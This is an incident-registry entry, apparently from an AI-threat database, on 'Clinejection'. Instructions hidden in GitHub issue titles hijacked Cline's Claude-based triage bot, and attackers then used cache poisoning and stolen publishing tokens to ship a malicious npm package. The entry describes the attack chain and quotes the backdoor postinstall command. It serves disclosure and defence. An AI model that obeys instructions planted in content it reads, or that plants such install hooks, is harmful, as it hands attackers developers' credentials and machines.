INC-26-0016 confirmed critical Clinejection: Prompt Injection in Cline AI Bot Enables npm Supply Chain Attack (2026)
Cline (VS Code extension) developed and Cline deployed Cline AI Issue Triage Bot (Claude-based), harming Developers who installed the malicious cline@2.3.0 npm package and Users of OpenClaw agents installed via the backdoor ; possible contributing factors include prompt injection vulnerability, inadequate access controls, and insufficient safety testing.
Incident Details
| Date Occurred | 2026-02 |
| Severity | critical |
| Evidence Level | primary |
| Impact Level | Sector-wide |
| Domain | Security & Cyber |
| Primary Pattern | PAT-SEC-008 AI Supply Chain Attack |
| Secondary Patterns | PAT-SEC-006 Prompt Injection Attack |
| Regions | north america, europe |
| Sectors | Technology |
| Affected Groups | Developers & AI Builders |
| Exposure Pathways | Adversarial Targeting, Infrastructure Dependency |
| Causal Factors | Prompt Injection Vulnerability, Inadequate Access Controls, Insufficient Safety Testing |
| Assets & Technologies | Large Language Models, Autonomous Agents, Identity Credentials |
| Entities | Cline (VS Code extension)(developer), ·Cline(deployer, victim) |
| Harm Type | operational |
A prompt injection vulnerability in Cline's AI-powered GitHub issue triage bot allowed attackers to trigger arbitrary code execution by opening a crafted issue, leading to theft of npm publishing tokens and distribution of a malicious cline@2.3.0 package that installed the OpenClaw backdoor on approximately 4,000 developer machines within eight hours.
Incident Summary
A prompt injection vulnerability in Cline’s AI-powered GitHub issue triage bot allowed arbitrary code execution via crafted issue titles containing hidden instructions for the Claude-based bot.[1] Attackers then used GitHub Actions cache poisoning — filling the cache with over 10 GB of junk data to force LRU eviction of legitimate entries — to inject poisoned dependencies into the nightly release workflow and steal the VSCE_PAT, OVSX_PAT, and NPM_RELEASE_TOKEN publishing credentials.[1] Security researcher Adnan Khan discovered the vulnerability in December 2025 and attempted private disclosure three times over five weeks without response, before disclosing publicly on February 9, 2026; Cline patched within one hour.[1] However, on February 17, an unknown actor published a malicious cline@2.3.0 package to npm before Cline properly revoked the compromised token. The package installed OpenClaw as a backdoor via a single postinstall script (npm install -g openclaw@latest) and reached approximately 4,000 downloads within eight hours before Cline deprecated it.[2][3]
Key Facts
- Vulnerability: Prompt injection in Cline’s Claude-based issue triage bot allowed arbitrary code execution through crafted GitHub issue titles[1]
- Attack chain: Cache poisoning of GitHub Actions (10+ GB junk data to force LRU eviction) → poisoned dependencies in nightly release workflow → credential theft of VSCE_PAT, OVSX_PAT, and NPM_RELEASE_TOKEN[1]
- Malicious package: cline@2.3.0 published to npm on February 17, 2026, containing only a postinstall script:
npm install -g openclaw@latest[2][3] - Impact: Approximately 4,000 downloads in eight hours before deprecation[2][4]
- Cline install base: 5 million installs across extension marketplaces at the time of the incident[1]
- Disclosure timeline: Vulnerability reported privately January 1, 2026; no response after three contact attempts over five weeks; public disclosure February 9; patched within one hour of public disclosure[1]
- Token management failure: The malicious 2.3.0 was published eight days after the vulnerability was patched because Cline failed to properly revoke the compromised npm token[1]
- Remediation: Cline deprecated 2.3.0, released clean 2.4.0, and confirmed no malicious releases reached VS Code Marketplace or OpenVSX; vulnerability assigned GHSA-9ppg-jx86-fqw7[1]
Threat Patterns Involved
Primary: AI Supply Chain Attack — The Clinejection attack demonstrates a novel AI-specific supply chain vector: weaponizing an AI-powered development workflow bot to compromise the software release pipeline. Unlike traditional supply chain attacks that exploit code dependencies, this attack exploited the trust placed in an AI agent integrated into the development process, using prompt injection to turn the AI bot into an unwitting accomplice in credential theft.
Secondary: Prompt Injection Attack — The root cause was a prompt injection vulnerability in the Claude-based issue triage system. An attacker could embed hidden instructions in a GitHub issue title that the AI bot would execute, demonstrating that AI agents integrated into CI/CD pipelines create new attack surfaces where natural language becomes an exploitation vector.
Significance
- AI bots as supply chain entry points — Clinejection is among the first documented cases where an AI-powered development bot was weaponized through prompt injection to compromise a software supply chain, establishing a new category of supply chain attack unique to AI-integrated development workflows
- Disclosure process failure — The five-week gap between private disclosure and public disclosure, during which Cline did not respond, followed by improper token revocation that allowed the malicious 2.3.0 to be published eight days after patching, highlights the operational security challenges when AI developer tool companies lack mature vulnerability disclosure processes
- Cascading AI ecosystem risk — The malicious package installed OpenClaw as its backdoor payload, creating a direct link between the Clinejection vulnerability and the broader OpenClaw security crisis (INC-26-0013), demonstrating how compromises in one AI tool can cascade through the AI development ecosystem
- Prompt injection in CI/CD pipelines — The attack demonstrates that integrating AI agents into automated workflows without input sanitization creates exploitable attack surfaces at the intersection of natural language processing and software security
Timeline
Prompt injection vulnerability first observed in production in Cline's AI issue triage workflow
Security researcher Adnan Khan submits vulnerability report via GitHub private vulnerability reporting
Khan sends follow-up via email; no response received
Khan attempts contact via social media; no response received
Public disclosure; Cline fixes vulnerability within one hour
Unknown actor publishes malicious cline@2.3.0 to npm using stolen token
Cline deprecates 2.3.0 and releases 2.4.0 with proper token revocation
Outcomes
- Recovery:
- Cline deprecated malicious 2.3.0 and released clean 2.4.0; vulnerability assigned GHSA-9ppg-jx86-fqw7
- Other:
- Cline audit confirmed no malicious releases reached VS Code Marketplace or OpenVSX
Use in Retrieval
INC-26-0016 documents Clinejection: Prompt Injection in Cline AI Bot Enables npm Supply Chain Attack, a critical-severity incident classified under the Security & Cyber domain and the AI Supply Chain Attack threat pattern (PAT-SEC-008). It occurred in North America, Europe (2026-02). This page is maintained by TopAIThreats.com as part of an evidence-based registry of AI-enabled threats. Cite as: TopAIThreats.com, "Clinejection: Prompt Injection in Cline AI Bot Enables npm Supply Chain Attack," INC-26-0016, last updated 2026-03-29.
Sources
- Clinejection: From Issue to RCE in Cline (primary, 2026-02-09)
https://adnanthekhan.com/posts/clinejection/ (opens in new tab) - Cline Supply Chain Attack: Prompt Injection via GitHub Actions (analysis, 2026-02)
https://snyk.io/blog/cline-supply-chain-attack-prompt-injection-github-actions/ (opens in new tab) - Cline CLI 2.3.0 Supply Chain Attack Installs OpenClaw Backdoor (news, 2026-02)
https://thehackernews.com/2026/02/cline-cli-230-supply-chain-attack.html (opens in new tab) - Supply Chain Attack Targets OpenClaw and Cline Users (news, 2026-02)
https://www.darkreading.com/application-security/supply-chain-attack-openclaw-cline-users (opens in new tab)
Update Log
- — First logged (Status: Confirmed, Evidence: Primary)